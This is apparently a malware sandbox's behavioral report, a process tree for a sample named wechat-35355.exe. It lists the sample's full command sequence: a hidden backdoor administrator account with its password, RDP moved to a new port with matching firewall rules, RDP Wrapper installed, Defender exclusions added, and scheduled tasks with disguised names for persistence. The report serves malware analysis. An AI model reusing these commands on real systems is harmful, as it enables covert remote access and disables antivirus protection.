| ZeroBOX

wechat-35355.exe "C:\Users\test22\AppData\Local\Temp\wechat-35355.exe"
1764
- cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Orlo.vst
  2024
  - cmd.exe cmd
    1944
    - findstr.exe findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
      1744
    - Pensai.exe.com Pensai.exe.com T
      2420
      - Pensai.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
        1612
        
        Pensai.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
        1088
        
        Pensai.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
        2312
        
        Pensai.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
        2648
        
        wusa.exe "C:\Windows\System32\wusa.exe" /quiet
        2440
    - findstr.exe findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
      2156
    - Vacillavo.exe.com Vacillavo.exe.com K
      456
      - Vacillavo.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com K
        2912
        
        Vacillavo.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
        1376
        
        cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
        3012
        
        cscript.exe cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
        2820
        
        cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs" ENWbXBorgA hKztsHIGxo "C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\KfPhiDQW.bat" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
        2552
        
        cscript.exe cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs" ENWbXBorgA hKztsHIGxo "C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\KfPhiDQW.bat" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
        1912
        
        cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
        156
        
        schtasks.exe schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
        1168
        
        cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
        1820
        
        cscript.exe cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
        2392
        
        cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
        2788
        
        cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat ENWbXBorgA hKztsHIGxo"
        3068
        
        cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        108
        
        WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
        1948
        
        cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        2116
        
        net.exe net user ENWbXBorgA hKztsHIGxo /add
        2272
        
        net1.exe C:\Windows\system32\net1 user ENWbXBorgA hKztsHIGxo /add
        2888
        
        net.exe net localgroup Administrators ENWbXBorgA /add
        2100
        
        net1.exe C:\Windows\system32\net1 localgroup Administrators ENWbXBorgA /add
        2212
        
        net.exe net localgroup "Remote Desktop Users" ENWbXBorgA /add
        2396
        
        net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" ENWbXBorgA /add
        236
        
        net.exe net accounts /maxpwage:unlimited
        2448
        
        reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ENWbXBorgA /t REG_DWORD /d "00000000" /f
        2040
        
        reg.exe reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        2504
        
        netsh.exe netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        2560
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        3088
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        3232
        
        powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        3376
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        3512
        
        timeout.exe Timeout /t 15
        3604
        
        cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        3872
        
        fsutil.exe fsutil dirty query C:
        3968
        
        sc.exe sc queryex "TermService"
        3816
        
        find.exe find "STATE"
        1972
        
        RDPWInst.exe "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        3192
        
        RDPWInst.exe "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        3320
        
        netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        468
        
        reg.exe reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        3856
        
        reg.exe reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        4012
        
        cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" 2>nul
        3648
        
        reg.exe reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        2192
        
        reg.exe reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        3208
        
        cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        3128
        
        reg.exe reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        3132
        
        reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
        3744
        
        findstr.exe findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        3468
        
        cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\195.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\722.vbs" "VlROR2NsQlZWazlXTWtwWlVXMDVlVm93UlcxVWF6bERXWG94YjFNemNEQmpNR2hLVWpOb2RrcHJlREphV0VaM1pETmpPV1Y2Clp6Qk9WVkpHVW10V1EweFVTWGhQVkZGMENrNUVXVEpTUXpGRFRVVk5kMHhVUmtaUFJVNUZUVlZaZWsxRVRUQlJXREE5" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
        1068
        
        cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
        2436
        
        schtasks.exe schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
        600
    - findstr.exe findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
      2756
    - Naso.exe.com Naso.exe.com B
      2948
      - Naso.exe.com C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com B
        1424
        
        RegAsm.exe C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        1852
    - PING.EXE ping 127.0.0.1 -n 30
      204
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents